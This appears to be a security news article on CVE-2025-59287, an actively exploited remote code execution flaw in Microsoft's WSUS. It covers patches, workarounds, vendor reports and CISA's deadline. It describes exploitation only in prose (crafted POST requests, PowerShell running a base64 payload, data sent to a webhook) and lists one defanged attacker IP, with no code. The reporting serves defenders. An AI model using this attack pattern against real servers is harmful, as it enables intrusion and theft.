Cybersecurity vendors are warning organizations that a critical vulnerability in Microsoft’s Windows Server Update Service (WSUS) and urging that they apply patches now that a proof-of-concept (POC) exploit is out there and the flaw is being actively exploited in the wild.

The vulnerability – tracked as CVE-2025-59287, with a CVSS score of 9.8 out of 10 – allows threat actors remote code execution (RCE) capabilities on unpatched WSUS servers, which can let them gain control of enterprise networks and use them to deliver malware.

“WSUS is a foundational tool for IT administrators, enabling the centralized management and distribution of Microsoft product updates across corporate networks,” Palo Alto Networks’ Unit 42 threat intelligence group wrote in a report this week. “Its role as a trusted source for software patches makes it a high-value target; a compromise of a WSUS server can provide a foothold for lateral movement and widespread network compromise.”

Microsoft wrote that by exploiting the flaw, “a remote, unauthenticated attacker could send a crafted event that triggers unsafe object deserialization in a legacy serialization mechanism, resulting in remote code execution.”

Patches Issued

The IT giant issued a patch for the security flaw October 10, but it didn’t completely fix the problem and on October 23 it rolled out an out-of-band security update. Microsoft also had outlined two workarounds organizations could run to bypass the flaw, which involved disabling the WSUS Server Role in the server if it had been enabled or blocking inbound traffic to Ports 8530 and 8531 on the host firewall.

However, Microsoft also urged security teams not to undo either workaround until they had applied the October 23 patch.

Global Exploitation

Security vendors like Hawktrace, which released a POC exploit code October 23, have been tracking the vulnerability for a couple of weeks and now they’re seeing it being exploited by bad actors.

“Within hours of the emergency update, Unit 42 and other security researchers observed active exploitation in the wild,” the Unit 42 researchers wrote. “The combination of a remotely exploitable, unauthenticated RCE in a core infrastructure service, coupled with observed active exploitation in the wild, represents a severe and time-sensitive risk.”

In a report late last week, security researchers with Huntress detected a similar trend, writing that they’d started seeing on October 23 threat actors targeting WSUS instances that were publicly exposed on their default to exploit the vulnerability.

“Attackers leveraged exposed WSUS endpoints to send specially crafted requests (multiple POST calls to WSUS web services) that triggered a deserialization RCE against the update service,” they wrote. “Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary: (process chains observed).”

A base64-encoded payload was decoded and executed in PowerShell, with the payload going through servers looking for sensitive network and user information that, when found, was sent to a remote webhook. Proxy networks were used to conduct and obfuscate exploitation, the researchers added.

CISA Urges Patching for Organizations

Dutch security company Eye Security wrote that its researchers also saw the WSUS flaw being exploited “world-wide, including our customer base.”

“Our telemetry shows scanning and exploitation attempts from 207.180.254[.]242, and our scans reveal roughly 2,500 WSUS servers still exposed world-wide, including about 100 in the Netherlands and 250 in Germany,” they wrote on LinkedIn. “This vulnerability is now being actively targeted, and we identified compromise attempts in our customer base we successfully blocked.”

CISA on October 24 also added CVE-2025-59287 to its catalog of known exploited flaws and said that federal civilian agencies must patch their systems within three weeks. The agency also is urging all organizations to apply the Microsoft patches “or risk an unauthenticated actor achieving remote code execution with system privileges.”